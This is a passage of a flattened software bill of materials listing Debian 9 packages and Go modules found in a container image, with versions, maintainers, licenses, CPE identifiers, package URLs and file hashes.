Ts'o <tytso@mit.edu> e2fslibs 1.43.4-2+deb9u2 GPL-2.0-only LGPL-2.0-only cpe:2.3:a:e2fslibs:e2fslibs:1.43.4-2\+deb9u2:*:*:*:*:*:*:* pkg:deb/debian/e2fslibs@1.43.4-2+deb9u2?arch=amd64&upstream=e2fsprogs&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/e2fslibs/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/e2fslibs:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 450 e2fsprogs Theodore Y. Ts'o <tytso@mit.edu> e2fsprogs 1.43.4-2+deb9u2 GPL-2.0-only LGPL-2.0-only cpe:2.3:a:e2fsprogs:e2fsprogs:1.43.4-2\+deb9u2:*:*:*:*:*:*:* pkg:deb/debian/e2fsprogs@1.43.4-2+deb9u2?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/e2fsprogs/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/e2fsprogs.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/e2fsprogs.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 4027 Andreas Metzler <ametzler@debian.org> findutils 4.6.0+git+20161106-2 GFDL-1.3-only GPL-3.0-only cpe:2.3:a:findutils:findutils:4.6.0\+git\+20161106-2:*:*:*:*:*:*:* pkg:deb/debian/findutils@4.6.0+git+20161106-2?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/findutils/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/findutils.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1854 Debian GCC Maintainers <debian-gcc@lists.debian.org> gcc-6-base 6.3.0-18+deb9u1 Artistic GFDL-1.2-only GPL GPL-2.0-only GPL-3.0-only 
cpe:2.3:a:gcc-6-base:gcc-6-base:6.3.0-18\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/gcc-6-base@6.3.0-18+deb9u1?arch=amd64&upstream=gcc-6&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:gcc-6-base:gcc_6_base:6.3.0-18\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:gcc_6_base:gcc-6-base:6.3.0-18\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:gcc_6_base:gcc_6_base:6.3.0-18\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:gcc-6:gcc-6-base:6.3.0-18\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:gcc-6:gcc_6_base:6.3.0-18\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:gcc_6:gcc-6-base:6.3.0-18\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:gcc_6:gcc_6_base:6.3.0-18\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:gcc:gcc-6-base:6.3.0-18\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:gcc:gcc_6_base:6.3.0-18\+deb9u1:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/gcc-6-base/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/gcc-6-base:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 209 gcc-6 github.com/opencontainers/runc v1.0.1 cpe:2.3:a:opencontainers:runc:v1.0.1:*:*:*:*:*:*:* pkg:golang/github.com/opencontainers/runc@v1.0.1 go-module-binary-cataloger go GolangBinMetadata go-module sha256:0305f2b14826a228defa3526b1fcd8af7291315d19e9e8dea531eb8725f1c369 /usr/local/bin/gosu x86_64 go1.16.7 h1:G18PGckGdAm3yVQRWDVQ1rLSLntiniKJ0cNRT2Tm5gs= github.com/tianon/gosu github.com/tianon/gosu (devel) cpe:2.3:a:tianon:gosu:\(devel\):*:*:*:*:*:*:* pkg:golang/github.com/tianon/gosu@(devel) go-module-binary-cataloger go GolangBinMetadata go-module sha256:0305f2b14826a228defa3526b1fcd8af7291315d19e9e8dea531eb8725f1c369 /usr/local/bin/gosu x86_64 go1.16.7 github.com/tianon/gosu Debian GnuPG Maintainers <pkg-gnupg-maint@lists.alioth.debian.org> gnupg 2.1.18-8~deb9u4 BSD-3-Clause Expat GPL-3.0-only GPL-3.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later RFC-Reference TinySCHEME permissive 
cpe:2.3:a:gnupg:gnupg:2.1.18-8\~deb9u4:*:*:*:*:*:*:* pkg:deb/debian/gnupg@2.1.18-8~deb9u4?arch=amd64&upstream=gnupg2&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/gnupg/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/gnupg.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 2093 gnupg2 Debian GnuPG Maintainers <pkg-gnupg-maint@lists.alioth.debian.org> gnupg-agent 2.1.18-8~deb9u4 BSD-3-Clause Expat GPL-3.0-only GPL-3.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later RFC-Reference TinySCHEME permissive cpe:2.3:a:gnupg-agent:gnupg-agent:2.1.18-8\~deb9u4:*:*:*:*:*:*:* pkg:deb/debian/gnupg-agent@2.1.18-8~deb9u4?arch=amd64&upstream=gnupg2&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:gnupg-agent:gnupg_agent:2.1.18-8\~deb9u4:*:*:*:*:*:*:* cpe:2.3:a:gnupg_agent:gnupg-agent:2.1.18-8\~deb9u4:*:*:*:*:*:*:* cpe:2.3:a:gnupg_agent:gnupg_agent:2.1.18-8\~deb9u4:*:*:*:*:*:*:* cpe:2.3:a:gnupg:gnupg-agent:2.1.18-8\~deb9u4:*:*:*:*:*:*:* cpe:2.3:a:gnupg:gnupg_agent:2.1.18-8\~deb9u4:*:*:*:*:*:*:* sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/gnupg-agent/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/gnupg-agent.conffiles sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/gnupg-agent.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1362 gnupg2 golang.org/x/sys v0.0.0-20210817142637-7d9622a276b7 cpe:2.3:a:golang:x\/sys:v0.0.0-20210817142637-7d9622a276b7:*:*:*:*:*:*:* pkg:golang/golang.org/x/sys@v0.0.0-20210817142637-7d9622a276b7 go-module-binary-cataloger go GolangBinMetadata go-module sha256:0305f2b14826a228defa3526b1fcd8af7291315d19e9e8dea531eb8725f1c369 /usr/local/bin/gosu 
x86_64 go1.16.7 h1:lQ8Btl/sJr2+f4ql7ffKUKfnV0BsgsICvm0oEeINAQY= github.com/tianon/gosu Debian GnuPG Maintainers <pkg-gnupg-maint@lists.alioth.debian.org> gpgv 2.1.18-8~deb9u4 BSD-3-Clause Expat GPL-3.0-only GPL-3.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later RFC-Reference TinySCHEME permissive cpe:2.3:a:gpgv:gpgv:2.1.18-8\~deb9u4:*:*:*:*:*:*:* pkg:deb/debian/gpgv@2.1.18-8~deb9u4?arch=amd64&upstream=gnupg2&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/gpgv/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/gpgv.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 721 gnupg2 Anibal Monsalve Salazar <anibal@debian.org> grep 2.27-2 GPL-3.0-only GPL-3.0-or-later cpe:2.3:a:grep:grep:2.27-2:*:*:*:*:*:*:* pkg:deb/debian/grep@2.27-2?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/grep/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/grep.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1131 Bdale Garbee <bdale@gag.com> gzip 1.6-5+deb9u1 GPL cpe:2.3:a:gzip:gzip:1.6-5\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/gzip@1.6-5+deb9u1?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/gzip/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/gzip.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 230 Debian Hostname Team <hostname-devel@lists.alioth.debian.org> hostname 3.18+b1 GPL-2.0-only cpe:2.3:a:hostname:hostname:3.18\+b1:*:*:*:*:*:*:* 
pkg:deb/debian/hostname@3.18+b1?arch=amd64&upstream=hostname%403.18&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/hostname/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/hostname.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 47 hostname 3.18 Debian systemd Maintainers <pkg-systemd-maintainers@lists.alioth.debian.org> init-system-helpers 1.48 BSD-3-Clause GPL-2.0-only GPL-2.0-or-later cpe:2.3:a:init-system-helpers:init-system-helpers:1.48:*:*:*:*:*:*:* pkg:deb/debian/init-system-helpers@1.48?arch=all&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:init-system-helpers:init_system_helpers:1.48:*:*:*:*:*:*:* cpe:2.3:a:init_system_helpers:init-system-helpers:1.48:*:*:*:*:*:*:* cpe:2.3:a:init_system_helpers:init_system_helpers:1.48:*:*:*:*:*:*:* cpe:2.3:a:init-system:init-system-helpers:1.48:*:*:*:*:*:*:* cpe:2.3:a:init-system:init_system_helpers:1.48:*:*:*:*:*:*:* cpe:2.3:a:init_system:init-system-helpers:1.48:*:*:*:*:*:*:* cpe:2.3:a:init_system:init_system_helpers:1.48:*:*:*:*:*:*:* cpe:2.3:a:init:init-system-helpers:1.48:*:*:*:*:*:*:* cpe:2.3:a:init:init_system_helpers:1.48:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/init-system-helpers/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/init-system-helpers.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 131 Anibal Monsalve Salazar <anibal@debian.org> libacl1 2.2.52-3+b1 GPL LGPL-2.1-only cpe:2.3:a:libacl1:libacl1:2.2.52-3\+b1:*:*:*:*:*:*:* pkg:deb/debian/libacl1@2.2.52-3+b1?arch=amd64&upstream=acl%402.2.52-3&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 
/usr/share/doc/libacl1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libacl1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 62 acl 2.2.52-3 APT Development Team <deity@lists.debian.org> libapt-pkg5.0 1.4.11 GPL-2.0-only GPLv2+ cpe:2.3:a:libapt-pkg5.0:libapt-pkg5.0:1.4.11:*:*:*:*:*:*:* pkg:deb/debian/libapt-pkg5.0@1.4.11?arch=amd64&upstream=apt&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libapt-pkg5.0:libapt_pkg5.0:1.4.11:*:*:*:*:*:*:* cpe:2.3:a:libapt_pkg5.0:libapt-pkg5.0:1.4.11:*:*:*:*:*:*:* cpe:2.3:a:libapt_pkg5.0:libapt_pkg5.0:1.4.11:*:*:*:*:*:*:* cpe:2.3:a:libapt:libapt-pkg5.0:1.4.11:*:*:*:*:*:*:* cpe:2.3:a:libapt:libapt_pkg5.0:1.4.11:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libapt-pkg5.0/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libapt-pkg5.0:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 3056 apt Debian GnuPG-Maintainers <pkg-gnupg-maint@lists.alioth.debian.org> libassuan0 2.4.3-2 GAP GAP~FSF GPL-2.0-only GPL-2.0-or-later GPL-3.0-only GPL-3.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later cpe:2.3:a:libassuan0:libassuan0:2.4.3-2:*:*:*:*:*:*:* pkg:deb/debian/libassuan0@2.4.3-2?arch=amd64&upstream=libassuan&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libassuan0/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libassuan0:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 106 libassuan Anibal Monsalve Salazar <anibal@debian.org> libattr1 1:2.4.47-2+b2 GPL-2.0-only LGPL-2.1-only cpe:2.3:a:libattr1:libattr1:1\:2.4.47-2\+b2:*:*:*:*:*:*:* 
pkg:deb/debian/libattr1@1:2.4.47-2+b2?arch=amd64&upstream=attr%401:2.4.47-2&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libattr1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libattr1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 42 attr 1:2.4.47-2 Laurent Bigonville <bigon@debian.org> libaudit-common 1:2.6.7-2 GPL-1.0-only GPL-2.0-only LGPL-2.1-only cpe:2.3:a:libaudit-common:libaudit-common:1\:2.6.7-2:*:*:*:*:*:*:* pkg:deb/debian/libaudit-common@1:2.6.7-2?arch=all&upstream=audit&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libaudit-common:libaudit_common:1\:2.6.7-2:*:*:*:*:*:*:* cpe:2.3:a:libaudit_common:libaudit-common:1\:2.6.7-2:*:*:*:*:*:*:* cpe:2.3:a:libaudit_common:libaudit_common:1\:2.6.7-2:*:*:*:*:*:*:* cpe:2.3:a:libaudit:libaudit-common:1\:2.6.7-2:*:*:*:*:*:*:* cpe:2.3:a:libaudit:libaudit_common:1\:2.6.7-2:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libaudit-common/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libaudit-common.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libaudit-common.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 30 audit Laurent Bigonville <bigon@debian.org> libaudit1 1:2.6.7-2 GPL-1.0-only GPL-2.0-only LGPL-2.1-only cpe:2.3:a:libaudit1:libaudit1:1\:2.6.7-2:*:*:*:*:*:*:* pkg:deb/debian/libaudit1@1:2.6.7-2?arch=amd64&upstream=audit&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libaudit1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libaudit1:amd64.md5sums 
sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 150 audit Debian util-linux Maintainers <ah-util-linux@debian.org> libblkid1 2.29.2-1+deb9u1 BSD-2-Clause BSD-3-Clause BSD-4-Clause GPL-2.0-only GPL-2.0-or-later GPL-3.0-only GPL-3.0-or-later LGPL LGPL-2.0-only LGPL-2.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later MIT public-domain cpe:2.3:a:libblkid1:libblkid1:2.29.2-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libblkid1@2.29.2-1+deb9u1?arch=amd64&upstream=util-linux&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libblkid1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libblkid1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 367 util-linux Guillem Jover <guillem@debian.org> libbsd0 0.8.3-1+deb9u1 BSD-2-Clause BSD-2-Clause BSD-2-clause-author BSD-2-clause-verbatim BSD-3-Clause BSD-3-clause-Peter-Wemm BSD-3-clause-Regents BSD-4-clause-Christopher-G-Demetriou BSD-4-clause-Niels-Provos BSD-5-clause-Peter-Wemm Beerware Expat ISC ISC-Original public-domain public-domain-Colin-Plumb cpe:2.3:a:libbsd0:libbsd0:0.8.3-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libbsd0@0.8.3-1+deb9u1?arch=amd64&upstream=libbsd&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libbsd0/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libbsd0:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 159 libbsd Anibal Monsalve Salazar <anibal@debian.org> libbz2-1.0 1.0.6-8.1 GPL-2.0-only cpe:2.3:a:libbz2-1.0:libbz2-1.0:1.0.6-8.1:*:*:*:*:*:*:* pkg:deb/debian/libbz2-1.0@1.0.6-8.1?arch=amd64&upstream=bzip2&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb 
cpe:2.3:a:libbz2-1.0:libbz2_1.0:1.0.6-8.1:*:*:*:*:*:*:* cpe:2.3:a:libbz2_1.0:libbz2-1.0:1.0.6-8.1:*:*:*:*:*:*:* cpe:2.3:a:libbz2_1.0:libbz2_1.0:1.0.6-8.1:*:*:*:*:*:*:* cpe:2.3:a:libbz2:libbz2-1.0:1.0.6-8.1:*:*:*:*:*:*:* cpe:2.3:a:libbz2:libbz2_1.0:1.0.6-8.1:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libbz2-1.0/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libbz2-1.0:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 96 bzip2 GNU Libc Maintainers <debian-glibc@lists.debian.org> libc-bin 2.24-11+deb9u4 GPL-2.0-only LGPL-2.1-only cpe:2.3:a:libc-bin:libc-bin:2.24-11\+deb9u4:*:*:*:*:*:*:* pkg:deb/debian/libc-bin@2.24-11+deb9u4?arch=amd64&upstream=glibc&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libc-bin:libc_bin:2.24-11\+deb9u4:*:*:*:*:*:*:* cpe:2.3:a:libc_bin:libc-bin:2.24-11\+deb9u4:*:*:*:*:*:*:* cpe:2.3:a:libc_bin:libc_bin:2.24-11\+deb9u4:*:*:*:*:*:*:* cpe:2.3:a:libc:libc-bin:2.24-11\+deb9u4:*:*:*:*:*:*:* cpe:2.3:a:libc:libc_bin:2.24-11\+deb9u4:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libc-bin/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libc-bin.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libc-bin.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 3366 glibc GNU Libc Maintainers <debian-glibc@lists.debian.org> libc-l10n 2.24-11+deb9u4 GPL-2.0-only LGPL-2.1-only cpe:2.3:a:libc-l10n:libc-l10n:2.24-11\+deb9u4:*:*:*:*:*:*:* pkg:deb/debian/libc-l10n@2.24-11+deb9u4?arch=all&upstream=glibc&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libc-l10n:libc_l10n:2.24-11\+deb9u4:*:*:*:*:*:*:* cpe:2.3:a:libc_l10n:libc-l10n:2.24-11\+deb9u4:*:*:*:*:*:*:* 
cpe:2.3:a:libc_l10n:libc_l10n:2.24-11\+deb9u4:*:*:*:*:*:*:* cpe:2.3:a:libc:libc-l10n:2.24-11\+deb9u4:*:*:*:*:*:*:* cpe:2.3:a:libc:libc_l10n:2.24-11\+deb9u4:*:*:*:*:*:*:* sha256:5afa113a433cd32056370367d1a936a5e77cc30cca6590c0241acffa33d1ec56 /usr/share/doc/libc-l10n/copyright sha256:5afa113a433cd32056370367d1a936a5e77cc30cca6590c0241acffa33d1ec56 /var/lib/dpkg/info/libc-l10n.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 4211 glibc GNU Libc Maintainers <debian-glibc@lists.debian.org> libc6 2.24-11+deb9u4 GPL-2.0-only LGPL-2.1-only cpe:2.3:a:libc6:libc6:2.24-11\+deb9u4:*:*:*:*:*:*:* pkg:deb/debian/libc6@2.24-11+deb9u4?arch=amd64&upstream=glibc&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libc6/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libc6:amd64.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libc6:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 10686 glibc Pierre Chifflier <pollux@debian.org> libcap-ng0 0.7.7-3+b1 GPL-2.0-only GPL-3.0-only LGPL-2.1-only cpe:2.3:a:libcap-ng0:libcap-ng0:0.7.7-3\+b1:*:*:*:*:*:*:* pkg:deb/debian/libcap-ng0@0.7.7-3+b1?arch=amd64&upstream=libcap-ng%400.7.7-3&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libcap-ng0:libcap_ng0:0.7.7-3\+b1:*:*:*:*:*:*:* cpe:2.3:a:libcap_ng0:libcap-ng0:0.7.7-3\+b1:*:*:*:*:*:*:* cpe:2.3:a:libcap_ng0:libcap_ng0:0.7.7-3\+b1:*:*:*:*:*:*:* cpe:2.3:a:libcap:libcap-ng0:0.7.7-3\+b1:*:*:*:*:*:*:* cpe:2.3:a:libcap:libcap_ng0:0.7.7-3\+b1:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libcap-ng0/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libcap-ng0:amd64.md5sums 
sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 43 libcap-ng 0.7.7-3 Theodore Y. Ts'o <tytso@mit.edu> libcomerr2 1.43.4-2+deb9u2 cpe:2.3:a:libcomerr2:libcomerr2:1.43.4-2\+deb9u2:*:*:*:*:*:*:* pkg:deb/debian/libcomerr2@1.43.4-2+deb9u2?arch=amd64&upstream=e2fsprogs&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libcomerr2/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libcomerr2:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 84 e2fsprogs Debian Berkeley DB Group <pkg-db-devel@lists.alioth.debian.org> libdb5.3 5.3.28-12+deb9u1 cpe:2.3:a:libdb5.3:libdb5.3:5.3.28-12\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libdb5.3@5.3.28-12+deb9u1?arch=amd64&upstream=db5.3&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libdb5.3/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libdb5.3:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1814 db5.3 Debian Install System Team <debian-boot@lists.debian.org> libdebconfclient0 0.227 cpe:2.3:a:libdebconfclient0:libdebconfclient0:0.227:*:*:*:*:*:*:* pkg:deb/debian/libdebconfclient0@0.227?arch=amd64&upstream=cdebconf&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libdebconfclient0/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libdebconfclient0:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 67 cdebconf LLVM Packaging Team <pkg-llvm-team@lists.alioth.debian.org> libedit2 3.1-20160903-3 
